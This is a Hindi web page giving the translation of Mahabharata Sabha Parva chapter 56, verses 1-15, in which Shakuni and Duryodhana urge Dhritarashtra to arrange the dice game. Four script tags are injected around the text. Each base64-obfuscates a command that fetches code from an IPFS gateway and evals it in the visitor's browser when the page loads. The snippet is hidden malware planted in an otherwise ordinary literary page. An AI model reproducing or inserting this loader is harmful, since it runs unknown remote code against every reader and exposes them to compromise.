महाभारत सभा पर्व अध्याय 56 श्लोक 1-15

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

षट्पश्चाशत्तम (56) अध्‍याय: सभा पर्व (द्यूत पर्व)

महाभारत: सभा पर्व: षट्पश्चाशत्तम अध्याय: श्लोक 1-15 का हिन्दी अनुवाद

धृतराष्ट्र और दुर्योधन की बातचीत, द्यूतक्रीडा के लिये सभानिर्माण और धृतराष्ट्र का युधिष्ठिर को बुलाने के लिये विदुर को आज्ञा देना

शकुनि बोला- विजयी वीरों में श्रेष्ठ दुर्योधन! तुम पाण्डुपुत्र युधिष्ठिर की जिस लक्ष्मी को देखकर संतप्त हो रहे हो, उसका मैं द्यूत के द्वारा अपहरण कर लूँगा। परंतु राजन्! तुम कुन्ती पुत्र युधिष्ठिर को बुला लो। मैं किसी संशय में पड़ने बिना, सेना के सामने युद्ध किये बिना केवल पासे फेंक कर स्वयं किसी प्रकार की क्षति उठाये बिना ही पाण्डवों को जी लूँगा, क्योंकि मैं द्यूतविद्या का ज्ञाता हूँ और पाण्डव इस कला से अनभिज्ञ हैं। भारत! दावों को मेरे धनुष समझो और पासों को मेरे बाण। पासों का जो ह्रदय (मर्म) है, उसी को मेरे धनुष की प्रत्यन्चा समझों और जहाँ से पासे फेंके जाते हैं, वह स्थान ही मेरा रथ है। दुर्योधन बोला- राजन्! ये मामाजी पासे फेंकने की कला में निपुण हैं। ये द्यूत के द्वारा पाण्डवों से उनकी सम्पत्ति ले लेने का उत्साह रखते हैं। उसके लिये इन्हें आज्ञा दीजिये। धृतराष्ट्र बोले- बेटा! मैं अपने भाई महात्मा विदुर की सम्मति के अनुसार चलता हूँ। उनसे मिलकर यह जान सकूँगा कि इस कार्य के विषय में क्या निश्चय करना चाहिये? दुर्योधन बोला- पिताजी! विदुर सब प्रकार से संशय रहित है। वे आपकी बुद्धि को जूए के निश्चय से हटा देंगे। कुरुनन्दन! वे जैसे पाण्डवों के हित में संलग्र रहते हैं, वैसे मेरे हित में नहीं। मनुष्य को चाहिये कि वह अपना कार्य दूसरे के बल पर न करे। कुरुराज! किसी भी कार्य में दो पुरुषों की राय पूर्णरूप से नहीं मिलती। मूर्ख मनुष्य भय का त्याग और आत्मरक्षा करते हुए भी यदि चुपचाप बैठा रहे, उद्योग न करे, तो वह वर्षो काल में भींगी हुई चटाई के समान नष्ट हो जाता है। रोग अथवा यमराज इस बात की प्रतीक्षा नहीं करते कि इसने श्रेय प्राप्त कर लिया या नहीं। अत: जब तक अपने में सामर्थ्य हो, तभी तक अपने हित का साधन कर लेना चाहिये। धृतराष्ट्र ने कहा- बेटा! मुझे तो बलवानों के साथ विरोध करना किसी प्रकार भी अच्छा नहीं लगता, क्योंकि वैर विरोध बड़ा भारी झगड़ा खड़ा कर देता है, जो (कुल के विनाश के लिए) बिना लोहे का शस्त्र है। राजकुमार! तुम द्यूतरूपी अनर्थ को ही अर्थ मान रहे हो। यह जूआ कहल को ही गूँथने वाला एवं अत्यन्त भयंकर है। यदि किसी प्रकार यह शुरु हो गया तो तीखी तलवारों और बाणों की भी सृष्टि कर देगा। दुर्योधन बोला- पिताजी! पुराने लोगोंने भी द्यूतक्रीड़ा का व्यवहार किया है। उसमें न तो दोष है और न युद्ध ही होता है। अत: आप शकुनि मामा की बात मान लीजिये और शीघ्र ही यहाँ (द्यूत के लिये) सभामण्डप बन जाने की आज्ञा दीजिये। यह जूआ हम खेलने वालों के लिये एक विशिष्ट स्वर्गीय सुख का द्वार है। उसके आस-पास बैठने वाले लोगों के लिये भी वह वैसा ही सुखद होता है। इस प्रकार इसमें पाण्डवों को भी हमारे समान ही सुख प्राप्त होगा। अत: आप पाण्डवों के साथ द्यूतक्रीड़ा की व्यवस्था कीजिये। धृतराष्ट्र ने कहा- बेटा! तुमने जो बात कही है, वह मुझे अच्छी नही लगती। नरेन्द्र! जैसी तुम्हारी रुचि हो, वैसा करो। जूए का आरम्भ करने पर मेरी बातों को याद करके तुम पीछे पछता ओगे, क्योंकि ऐसी बातें जो तुम्हारे मुख से निकली हैं, धर्मानुकूल नहीं कहीं जा सकतीं।


« पीछे आगे »

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

साँचा:सम्पूर्ण महाभारत अभी निर्माणाधीन है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>